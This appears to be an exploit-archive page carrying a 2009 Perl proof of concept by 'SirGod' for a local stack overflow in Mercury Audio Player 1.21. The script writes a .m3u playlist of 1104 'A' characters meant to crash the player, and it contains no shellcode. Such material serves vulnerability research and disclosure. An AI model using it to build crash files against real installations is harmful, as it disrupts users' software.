[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Mercury Audio Player 1.21 (.M3U File) Local Stack Overflow PoC
# Published : 2009-04-30
# Author : SirGod
# Previous Title : Google Chrome 1.0.154.53 (Null Pointer) Remote Crash Exploit
# Next Title : Multiple Vendor PF Null Pointer Dereference Vulnerability


###################################################################################
####      Mercury Audio Player 1.21 (.M3U File) Local Stack Overflow PoC      #####
####       Discovered by SirGod  -  www.mortal-team.net                       #####
###################################################################################
my $chars= "A" x 1104;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";

# www.Syue.com [2009-04-30]